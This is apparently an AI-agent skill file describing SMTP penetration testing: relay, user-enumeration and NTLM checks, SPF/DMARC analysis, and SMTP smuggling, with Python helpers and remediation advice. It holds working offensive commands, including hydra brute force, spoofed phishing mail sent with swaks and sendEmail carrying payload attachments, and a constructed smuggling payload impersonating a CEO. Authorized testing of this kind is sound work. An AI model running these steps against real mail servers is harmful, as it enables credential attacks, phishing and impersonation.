pentesting-smtp

Install: `npx mdskill add xalgord/xalgorix/pentesting-smtp`

Source: `.github/skills/pentesting-smtp/SKILL.md`
---
name: pentesting-smtp
description: Testing SMTP services (default ports 25, 465/SSL, 587/submission) for open relays, user enumeration (VRFY/EXPN/RCPT), NTLM info disclosure, weak/no authentication, SPF/DKIM/DMARC spoofing gaps, Secure Email Gateway bypass, and SMTP smuggling during authorized engagements.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- smtp
version: '1.0'
author: xalgorix
license: Apache-2.0
---
# Pentesting SMTP (ports 25, 465, 587)
## When to Use
- Default ports: `25/tcp` (MTA-to-MTA), `465/tcp` (SMTPS), `587/tcp` (submission/STARTTLS).
- When `nmap`/banner shows `smtp`, `ESMTP`, `Sendmail`, `Postfix`, `Exim`, or `Microsoft ESMTP`.
- For testing relay policy, user enumeration, email-spoofing controls (SPF/DKIM/DMARC), and gateway routing.
## Quick Enumeration
```bash
# Plaintext banner + manual session
nc -vn <IP> 25
# SMTPS / STARTTLS
openssl s_client -crlf -connect <IP>:465 # implicit TLS
openssl s_client -starttls smtp -crlf -connect <IP>:587
# MX discovery
dig +short mx <domain>
# nmap scripts: commands, open-relay, NTLM info
nmap -p25 --script smtp-commands <IP>
nmap -p25 --script smtp-open-relay -v <IP>
nmap -p25 --script smtp-ntlm-info <IP>
```
## Critical: Checks Most Often Missed
- **Open relay** — server forwards mail for arbitrary external sender/recipient. High-impact, frequently missed.
- How to CONFIRM: `nmap -p25 --script smtp-open-relay -v <IP>` reports relaying, or manually `MAIL FROM:<a@evil.com>` + `RCPT TO:<b@external.com>` gets a `250`. A `250` at `RCPT TO` alone is not final proof: some MTAs reject or silently discard only after `DATA`, so finish the transaction to a mailbox you control and confirm it arrives.
- **User enumeration without auth** — `VRFY`, `EXPN`, and differential `RCPT TO` responses leak valid accounts.
- How to CONFIRM:
```bash
nc <IP> 25
HELO x
VRFY root                        # 250/251 = exists, 550 = unknown, 252 = server refuses to confirm
EXPN root                        # expands aliases/lists; 502 or 252 when disabled
MAIL FROM:<probe@example.com>    # RCPT is only valid inside a transaction
RCPT TO:<admin@example.local>    # use the target's accepted domain; compare 250 vs 550 (all-250 = no enumeration)
smtp-user-enum -M VRFY -U users.txt -t <IP>
```
- **NTLM info disclosure** — where `AUTH NTLM` is advertised (typically Exchange/IIS SMTP on 25 or 587), the Type 2 challenge the server returns before any credential is checked carries its NetBIOS and DNS hostname, domain and Windows version.
- How to CONFIRM: `nmap -p587 --script smtp-ntlm-info <IP>`, or manually: `EHLO x`, then `AUTH NTLM`; the server answers `334`, you send the minimal Type 1 (negotiate) token `TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=`, and the server's next `334 <base64>` line is the Type 2 message to decode.
- **Spoofing controls (SPF/DKIM/DMARC) missing or weak** — `p=none`, relaxed alignment, or no SPF lets you spoof the domain.
- How to CONFIRM:
```bash
dig txt <domain> | grep spf
dig <selector>._domainkey.<domain> TXT | grep p=   # selector from the s= tag of any DKIM-Signature header the domain sends; common: google, default, selector1/selector2 (Microsoft 365). Empty p= means the key is revoked
dig _dmarc.<domain> txt | grep DMARC # p=none/quarantine/reject
```
- **SEG bypass** — if any accepted domain (or `<tenant>.onmicrosoft.com`) has an MX pointing directly at the mail server instead of the Secure Email Gateway, you can deliver mail past inspection.
- How to CONFIRM: `dig +short mx <accepted_domain>` resolves to Exchange Online / origin MTA, not the SEG.
- **SMTP smuggling / Exim STARTTLS+BDAT (GnuTLS UAF)** — two separate surfaces. Smuggling is a protocol desync: the outbound hop forwards a non-standard end-of-data sequence (for example `<LF>.<CR><LF>`) that it does not itself treat as message end, the inbound hop does, and one `DATA` payload becomes two messages; the second carries an attacker-chosen envelope yet still comes from the outbound server's IP, so SPF/DMARC for that server's domain pass. The Exim case is a memory-lifetime bug on Exim built against GnuTLS where `STARTTLS` and `CHUNKING`/`BDAT` are both advertised.
- How to CONFIRM: for smuggling, send through the outbound server a body containing `<LF>.<CR><LF>` followed by a second `MAIL FROM`/`RCPT TO`/`DATA` block and check whether the inbound server delivers two messages; for Exim, record the banner version and whether `EHLO` lists both `STARTTLS` and `CHUNKING`, then match it against Exim's own advisories rather than testing blind.
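The SPF/DKIM/DMARC check above is usually done by eyeballing `dig` output; the following is an added example (not code from the skill or its author) that turns the two TXT records into an explicit list of spoofing gaps. The records passed in are constructed strings standing in for `dig +short txt <domain>` and `dig +short txt _dmarc.<domain>`; the lookup limit (10), `pct` default (100) and `sp` default (same as `p`) follow RFC 7208 and RFC 7489.

```python
# Added example: rate how spoofable a domain is from its SPF and DMARC records.
# The records are constructed strings; feed it `dig +short txt` output in practice.

# SPF terms that each cost a DNS lookup (RFC 7208 caps the total at 10)
LOOKUP_TERMS = {"include", "a", "mx", "ptr", "exists", "redirect"}


def parse_spf(record):
    """Return {'all': qualifier or None, 'terms': [...], 'lookups': n}, or None if not SPF."""
    terms = record.strip().strip('"').split()
    if not terms or terms[0].lower() != "v=spf1":
        return None
    info = {"all": None, "terms": [], "lookups": 0}
    for term in terms[1:]:
        qual = "+"                                   # default qualifier is pass
        if term[0] in "+-~?":
            qual, term = term[0], term[1:]
        name = term.split(":", 1)[0].split("/", 1)[0].split("=", 1)[0].lower()
        if name == "all":
            info["all"] = qual
        else:
            info["terms"].append(qual + term)
        if name in LOOKUP_TERMS:
            info["lookups"] += 1
    return info


def parse_dmarc(record):
    """Return the tag dict with RFC 7489 defaults filled in, or None if not DMARC."""
    tags = {}
    for part in record.strip().strip('"').split(";"):
        key, sep, value = part.partition("=")
        if sep:
            tags[key.strip().lower()] = value.strip()
    if tags.get("v", "").upper() != "DMARC1":
        return None
    tags.setdefault("p", "none")
    tags.setdefault("sp", tags["p"])                 # subdomain policy inherits p
    tags.setdefault("adkim", "r")
    tags.setdefault("aspf", "r")
    tags.setdefault("pct", "100")
    return tags


def spoofing_findings(spf_record, dmarc_record):
    """Gaps that let an attacker put the domain in From: and still get delivered."""
    findings = []
    spf = parse_spf(spf_record) if spf_record else None
    dmarc = parse_dmarc(dmarc_record) if dmarc_record else None
    if spf is None:
        findings.append("[high] SPF: no record, any IP may use the domain in MAIL FROM")
    else:
        if spf["all"] in (None, "+"):
            findings.append("[high] SPF: +all or no all term, every sender passes")
        elif spf["all"] in ("~", "?"):
            findings.append("[medium] SPF: %sall only softfails/neutral, most receivers still deliver" % spf["all"])
        if spf["lookups"] > 10:
            findings.append("[medium] SPF: %d DNS lookups exceeds 10, evaluates to permerror" % spf["lookups"])
    if dmarc is None:
        findings.append("[high] DMARC: no record, SPF/DKIM results are never tied to the From: domain")
    else:
        if dmarc["p"] == "none":
            findings.append("[high] DMARC: p=none, monitoring only, spoofed From: is delivered")
        elif dmarc["p"] == "quarantine":
            findings.append("[medium] DMARC: p=quarantine, spoofed mail lands in junk, not rejected")
        if int(dmarc["pct"]) < 100:
            findings.append("[medium] DMARC: pct=%s, policy applied to a sample only" % dmarc["pct"])
        if dmarc["sp"] == "none" and dmarc["p"] != "none":
            findings.append("[medium] DMARC: sp=none leaves subdomains unprotected")
        if "r" in (dmarc["adkim"], dmarc["aspf"]):
            findings.append("[info] DMARC: relaxed alignment, any subdomain of the org domain aligns")
    return findings


if __name__ == "__main__":
    for line in spoofing_findings("v=spf1 include:_spf.google.com ~all",
                                  "v=DMARC1; p=none; rua=mailto:dmarc@example.local"):
        print(line)
```

Run it against the real records for every domain in scope, including subdomains that send mail on their own; `sp=` and `pct=` are the tags that most often hide a gap behind an otherwise strict `p=reject`.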
## Workflow
### Step 1: Enumerate (version, commands, auth)
```bash
nc -vn <IP> 25
# HELO/EHLO then read advertised features:
EHLO attacker.local # note STARTTLS, AUTH, VRFY, EXPN, SIZE, CHUNKING/BDAT, PIPELINING
nmap -p25 --script smtp-commands,smtp-ntlm-info <IP>
```
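`smtp-ntlm-info` prints the decoded fields for you; when only a raw `334 <base64>` line is in your notes (or the script is not available), the following added example (not the skill's own tooling, and not nmap's script) decodes the NTLM Type 2 challenge by hand. Field offsets follow MS-NLMP; the sample challenge is constructed by `build_type2_sample()` with made-up values, not captured from a real server.

```python
# Added example: decode the NTLM CHALLENGE_MESSAGE (Type 2) an SMTP server
# returns after `AUTH NTLM` + a Type 1 token. The sample message is constructed.
import base64
import struct

NEGOTIATE_TARGET_INFO = 0x00800000
NEGOTIATE_VERSION = 0x02000000
AV_NAMES = {1: "netbios_computer", 2: "netbios_domain", 3: "dns_computer",
            4: "dns_domain", 5: "dns_tree"}


def parse_type2(blob):
    """Target name, AV_PAIR strings and OS version from a Type 2 message (MS-NLMP 2.2.1.2)."""
    if blob[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", blob, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    tn_len, _, tn_off = struct.unpack_from("<HHI", blob, 12)       # TargetNameFields
    flags = struct.unpack_from("<I", blob, 20)[0]                   # NegotiateFlags
    info = {"target_name": blob[tn_off:tn_off + tn_len].decode("utf-16-le"), "flags": flags}
    if flags & NEGOTIATE_VERSION:                                   # Version sits at offset 48
        major, minor, build = struct.unpack_from("<BBH", blob, 48)
        info["os_version"] = "%d.%d build %d" % (major, minor, build)
    if flags & NEGOTIATE_TARGET_INFO:
        ti_len, _, pos = struct.unpack_from("<HHI", blob, 40)       # TargetInfoFields
        end = pos + ti_len
        while pos + 4 <= end:
            av_id, av_len = struct.unpack_from("<HH", blob, pos)
            pos += 4
            if av_id == 0:                                          # MsvAvEOL
                break
            value = blob[pos:pos + av_len]
            pos += av_len
            if av_id in AV_NAMES:
                info[AV_NAMES[av_id]] = value.decode("utf-16-le")
            elif av_id == 7:                                        # MsvAvTimestamp (FILETIME)
                info["timestamp"] = struct.unpack("<Q", value)[0]
    return info


def parse_smtp_challenge(reply_line):
    """Decode the '334 <base64>' line the server sends after the Type 1 token."""
    code, _, token = reply_line.strip().partition(" ")
    if code != "334":
        raise ValueError("expected a 334 continuation, got: " + reply_line)
    return parse_type2(base64.b64decode(token))


def _u16(s):
    return s.encode("utf-16-le")


def build_type2_sample(netbios_domain, netbios_host, dns_domain, dns_host, version=(10, 0, 17763)):
    """Constructed CHALLENGE_MESSAGE for the demo; every value here is made up."""
    target_name = _u16(netbios_domain)
    pairs = [(2, netbios_domain), (1, netbios_host), (4, dns_domain), (3, dns_host)]
    target_info = b"".join(struct.pack("<HH", i, len(_u16(v))) + _u16(v) for i, v in pairs)
    target_info += struct.pack("<HH", 0, 0)                         # MsvAvEOL
    flags = 0x00000001 | 0x00000200 | NEGOTIATE_TARGET_INFO | NEGOTIATE_VERSION  # UNICODE|NTLM|...
    major, minor, build = version
    msg = (b"NTLMSSP\x00" + struct.pack("<I", 2)
           + struct.pack("<HHI", len(target_name), len(target_name), 56)
           + struct.pack("<I", flags)
           + b"\x11" * 8                                            # ServerChallenge (fixed for demo)
           + b"\x00" * 8                                            # Reserved
           + struct.pack("<HHI", len(target_info), len(target_info), 56 + len(target_name))
           + struct.pack("<BBH4B", major, minor, build, 0, 0, 0, 15))  # Version, revision 15
    return msg + target_name + target_info


def sample_smtp_reply():
    """A constructed '334 ...' server line, as it would appear in a manual session."""
    blob = build_type2_sample("CORP", "MAIL01", "corp.example.local", "mail01.corp.example.local")
    return "334 " + base64.b64encode(blob).decode()


if __name__ == "__main__":
    print(parse_smtp_challenge(sample_smtp_reply()))
```

The interesting output is `netbios_domain`, `dns_computer` and `os_version`: they feed hostname wordlists for the internal network and tell you the Windows build before you have a single credential.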
### Step 2: User enumeration + auth brute force
```bash
# Username enumeration
smtp-user-enum -M VRFY -U users.txt -t <IP>
smtp-user-enum -M RCPT -U users.txt -t <IP>
nmap --script smtp-enum-users <IP>
msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_enum; set RHOSTS <IP>; run; exit'
# Auth brute force (when AUTH is required)
hydra -L users.txt -P passwords.txt smtp://<IP>
hydra -L users.txt -P passwords.txt smtp://<IP>:587/TLS:PLAIN   # STARTTLS on the submission port; mechanism LOGIN/PLAIN/CRAM-MD5/NTLM
nmap -p25,587 --script smtp-brute <IP>
```
### Step 3: Exploit / Extract (relay, spoof, deliver)
```bash
# Confirm open relay manually (use a recipient mailbox you control)
nc <IP> 25
EHLO x
MAIL FROM:<attacker@evil.com>
RCPT TO:<victim@external.com>    # 250 = relay policy accepts it; 554 "Relay access denied" = closed
DATA
Subject: relay test

relay test body
.
QUIT
# A 250 at RCPT TO is not final proof: some MTAs reject or discard only after DATA, so check the test mailbox actually receives the message
# Send a spoofed / phishing message
sendEmail -t to@domain.com -f from@attacker.com -s <IP> -u "Important" -m "Please see the attachment" -a /tmp/payload.pdf
swaks --to hr@example.local --from ceo@example.local --header "Subject: Resume" \
--body "Please review" --attach @resume.doc --server <IP> # @ embeds file bytes
# Validate spoofing posture
python3 -m pip install checkdmarc && checkdmarc <domain>
```
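Steps 2 and 3 above are manual `nc` sessions; the following added example (not the skill's own tooling) does the same two checks, differential `VRFY`/`RCPT` enumeration and the `MAIL FROM`/`RCPT TO` relay probe, over a raw socket while reading full multi-line replies. So that it runs offline, it also carries a small fake MTA; `LOCAL_DOMAIN`, `VALID_USERS` and the fake server's reply strings are constructed for the demo. On an engagement point `probe_users()` and `probe_open_relay()` at the target host and port instead.

```python
# Added example: VRFY/RCPT user enumeration and an open-relay probe over a raw
# socket, exercised against an in-process fake MTA so it runs offline.
import socket
import threading

LOCAL_DOMAIN = "example.local"                   # assumed accepted domain of the target
VALID_USERS = {"root", "admin", "postmaster"}    # constructed mailbox list for the fake MTA


class FakeMTA(threading.Thread):
    """Minimal SMTP responder: VRFY/RCPT reveal which users exist, and RCPT to a
    foreign domain is accepted only when open_relay=True."""

    def __init__(self, open_relay=False):
        super().__init__(daemon=True)
        self.open_relay = open_relay
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]

    def run(self):
        while True:
            self.serve(self.sock.accept()[0])

    def serve(self, conn):
        conn.sendall(b"220 mx.example.local ESMTP\r\n")
        for raw in conn.makefile("rb"):
            verb, _, arg = raw.decode("ascii", "replace").rstrip("\r\n").partition(" ")
            verb = verb.upper()
            if verb in ("HELO", "EHLO", "MAIL", "RSET"):
                reply = "250 mx.example.local Ok"
            elif verb == "VRFY":                 # 250 = exists, 550 = unknown: the leak
                reply = "250 <%s@%s>" % (arg, LOCAL_DOMAIN) if arg in VALID_USERS else "550 5.1.1 User unknown"
            elif verb == "RCPT":
                user, _, domain = arg.split(":", 1)[-1].strip("<> ").partition("@")
                if domain.lower() == LOCAL_DOMAIN:
                    reply = "250 2.1.5 Ok" if user in VALID_USERS else "550 5.1.1 User unknown"
                else:                            # relay decision for a foreign recipient
                    reply = "250 2.1.5 Ok" if self.open_relay else "554 5.7.1 Relay access denied"
            elif verb == "QUIT":
                conn.sendall(b"221 2.0.0 Bye\r\n")
                break
            else:
                reply = "502 5.5.2 Command not implemented"
            conn.sendall((reply + "\r\n").encode())
        conn.close()


class SmtpClient:
    """Raw SMTP session that reads whole (multi-line) replies and returns the code."""

    def __init__(self, host, port, helo="probe.local"):
        self.sock = socket.create_connection((host, port), timeout=10)
        self.rfile = self.sock.makefile("rb")
        self.read()                              # banner
        self.cmd("EHLO " + helo)

    def read(self):
        lines = []
        while True:
            line = self.rfile.readline().decode("ascii", "replace").rstrip("\r\n")
            if not line:                         # peer closed the connection
                return 0, lines
            lines.append(line)
            if len(line) < 4 or line[3] != "-":  # "250-..." continues, "250 ..." ends
                return (int(line[:3]) if line[:3].isdigit() else 0), lines

    def cmd(self, line):
        self.sock.sendall((line + "\r\n").encode())
        return self.read()

    def close(self):
        self.cmd("QUIT")
        self.sock.close()


def probe_users(host, port, candidates, method="RCPT", domain=LOCAL_DOMAIN):
    """Names the server confirms with 250/251. A 252 on every name means it
    refuses to confirm, i.e. enumeration by this verb is closed."""
    client = SmtpClient(host, port)
    if method == "RCPT":                         # RCPT is only valid inside a transaction
        client.cmd("MAIL FROM:<probe@probe.local>")
    found = []
    for user in candidates:
        line = "VRFY %s" % user if method == "VRFY" else "RCPT TO:<%s@%s>" % (user, domain)
        code, _ = client.cmd(line)
        if code in (250, 251):
            found.append(user)
    client.close()
    return found


def probe_open_relay(host, port, sender="probe@attacker.example", rcpt="probe@external.example"):
    """True when a foreign sender may address a foreign recipient. Use a mailbox
    you control as rcpt and confirm delivery: some MTAs only reject after DATA."""
    client = SmtpClient(host, port)
    client.cmd("MAIL FROM:<%s>" % sender)
    code, lines = client.cmd("RCPT TO:<%s>" % rcpt)
    client.cmd("RSET")                           # abort the transaction; never send DATA here
    client.close()
    return code in (250, 251), lines[-1]


if __name__ == "__main__":
    mta = FakeMTA(open_relay=True)
    mta.start()
    print(probe_users("127.0.0.1", mta.port, ["root", "nobody", "admin"], method="VRFY"))
    print(probe_open_relay("127.0.0.1", mta.port))
```

Keep the relay probe at `RCPT TO` and `RSET` out; the only time you go on to `DATA` is the final confirmation to your own mailbox, so nothing is actually relayed to a third party during the test.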
### Step 4: Post-access / pivot
- Use enumerated valid usernames as inputs for SSH/OWA/VPN password spraying.
- Harvest internal hostnames/IPs from NDN/bounce headers and `MAIL FROM` auto-completion (`MAIL FROM: me` → `me@PRODSERV01...`).
- Detect AV/SEG products from headers (`X-Virus-Scanned`) by sending an EICAR test file.
## Key Concepts
| Concept | Description |
|---------|-------------|
| **Open relay** | MTA forwards mail between arbitrary external parties — abused for spam/phishing. |
| **VRFY / EXPN / RCPT enum** | Verb responses differentiate valid vs invalid local accounts. |
| **SPF** | DNS TXT listing authorized sender IPs; the `all` qualifier decides the rest: `+all` (pass everything), `?all` (neutral), `~all` (softfail), `-all` (fail). |
| **DKIM** | DNS-published public key validates a cryptographic signature on outbound mail. |
| **DMARC** | Policy (`p=none/quarantine/reject`) + alignment tying SPF/DKIM to the From domain. |
| **SEG bypass** | MX of an accepted domain pointing at the origin MTA skips gateway inspection. |
| **SMTP smuggling** | Desync of end-of-data parsing between hops to inject a second message past controls. |
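The smuggling row above is easiest to understand by watching two receivers parse the same bytes. The following added example (not the skill's own code) emulates the inbound hop from the moment the outbound hop has issued `DATA`: a strict receiver sees one message, a receiver that also honours `<LF>.<CR><LF>` sees two, the second with the envelope the attacker embedded. The payload, envelopes and the list of candidate terminators are constructed for the demo; which non-standard terminators a real MTA accepts is version- and configuration-dependent.

```python
# Added example: how SMTP smuggling desyncs two MTAs on the end-of-data sequence.
# The payload, envelopes and terminator list are constructed for the demo.

STRICT_EOD = b"\r\n.\r\n"                        # the only terminator RFC 5321 defines
# Non-standard terminators worth trying against an inbound server
CANDIDATE_EODS = [b"\n.\r\n", b"\r\n.\r", b"\n.\n", b"\r.\r"]


def find_eod(stream, eods, start=0):
    """Earliest (index, sequence) of any accepted end-of-data sequence, or None."""
    best = None
    for seq in eods:
        idx = stream.find(seq, start)
        if idx != -1 and (best is None or idx < best[0]):
            best = (idx, seq)
    return best


def inbound_messages(stream, eods, envelope):
    """Emulate the inbound MTA after the outbound hop has sent DATA: read a body up
    to one of its accepted EODs, then treat what follows as new commands, repeat.
    Returns the messages it would queue, each with the envelope it believes."""
    messages, pos, in_data = [], 0, True
    env = dict(envelope)
    while pos < len(stream):
        if in_data:
            hit = find_eod(stream, eods, pos)
            if hit is None:                      # no terminator yet: body is incomplete
                messages.append(dict(env, body=stream[pos:], complete=False))
                break
            idx, seq = hit
            messages.append(dict(env, body=stream[pos:idx], complete=True))
            pos, in_data, env = idx + len(seq), False, {}
        else:
            nl = stream.find(b"\r\n", pos)
            line = stream[pos:nl] if nl != -1 else stream[pos:]
            pos = nl + 2 if nl != -1 else len(stream)
            verb, _, arg = line.decode("ascii", "replace").partition(" ")
            verb = verb.upper()
            if verb == "MAIL":
                env["mail_from"] = arg.split(":", 1)[-1].strip("<> ")
            elif verb == "RCPT":
                env["rcpt_to"] = arg.split(":", 1)[-1].strip("<> ")
            elif verb == "DATA":
                in_data = True
    return messages


def smugglable_eods(outbound_eods, inbound_eods):
    """Terminators the inbound hop honours but the outbound hop forwards verbatim."""
    return [seq for seq in inbound_eods if seq not in outbound_eods]


# Constructed payload: what the attacker submits as one DATA body to the outbound
# server, which in this demo recognises only STRICT_EOD and forwards the rest as-is.
SMUGGLING_PAYLOAD = (
    b"Subject: legit\r\n\r\nHello\r\n"
    + b"\n.\r\n"                                 # bare-LF terminator, passed through unchanged
    + b"MAIL FROM:<ceo@example.local>\r\n"       # second envelope, never seen by the outbound hop
    + b"RCPT TO:<hr@example.local>\r\n"
    + b"DATA\r\n"
    + b"Subject: smuggled\r\n\r\nWire the money\r\n"
    + b".\r\n"                                   # real terminator, ends the outbound DATA
)
OUTBOUND_ENVELOPE = {"mail_from": "attacker@example.net", "rcpt_to": "hr@example.local"}


def demo():
    strict = inbound_messages(SMUGGLING_PAYLOAD, [STRICT_EOD], OUTBOUND_ENVELOPE)
    lenient = inbound_messages(SMUGGLING_PAYLOAD, [STRICT_EOD] + CANDIDATE_EODS, OUTBOUND_ENVELOPE)
    return len(strict), len(lenient), lenient[-1]["mail_from"]


if __name__ == "__main__":
    print(demo())
```

The fix on the inbound side is to accept only `<CR><LF>.<CR><LF>`; on the outbound side, to reject or normalise bare `<LF>` in `DATA` so no foreign terminator is ever forwarded. `smugglable_eods()` is the difference between the two hops' behaviour, which is what you are really testing for.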
## Tools & Systems
| Tool | Purpose |
|------|---------|
| **nmap NSE** | `smtp-commands`, `smtp-open-relay`, `smtp-ntlm-info`, `smtp-enum-users`. |
| **nc / openssl s_client** | Manual SMTP/SMTPS sessions, relay and enum testing. |
| **smtp-user-enum** | VRFY/EXPN/RCPT user enumeration. |
| **swaks / sendEmail** | Crafting and sending spoofed/phishing mail with attachments. |
| **hydra / nmap `smtp-brute`** | SMTP AUTH brute force / spraying, including STARTTLS on 587. |
| **Metasploit** | `scanner/smtp/smtp_enum`, `scanner/smtp/smtp_version`. |
| **checkdmarc / mailspoof / magicspoofing** | Automated SPF/DKIM/DMARC misconfiguration discovery. |
## Common Scenarios
### Scenario 1: Open relay enables phishing
`nmap --script smtp-open-relay` confirms the MTA relays for external recipients. The tester sends a spoofed internal-looking email via `swaks` to demonstrate phishing capability against staff.
### Scenario 2: User enumeration → password spray
`VRFY`/`RCPT` differences reveal valid mailbox names. The list feeds an OWA/VPN password spray, landing one valid corporate credential.
### Scenario 3: DMARC p=none lets domain spoofing
`dig _dmarc.<domain>` returns `p=none`. With no enforcement, `swaks --from ceo@<domain>` is delivered to inboxes, proving impersonation risk.
## Output Format
```
## SMTP Finding
**Service**: SMTP
**Port**: 25/tcp (Postfix)
**Severity**: High
**Finding**: Open mail relay + missing DMARC enforcement
**Evidence**:
- nmap smtp-open-relay: "Server is an open relay"
- manual MAIL FROM:<a@evil.com> / RCPT TO:<b@external.com> accepted (250)
- dig _dmarc.<domain>: "v=DMARC1; p=none"
**Impact**: Attackers can relay spam/phishing through the server and spoof the organization's domain, damaging reputation and enabling social engineering.
**Recommendation**:
1. Restrict `mynetworks`/relay to trusted hosts only; never 0.0.0.0/0.
2. Disable VRFY/EXPN; normalize RCPT responses.
3. Publish strict SPF (`-all`), DKIM, and DMARC (`p=reject`, strict alignment).
4. Ensure all accepted-domain MX records route through the Secure Email Gateway.
```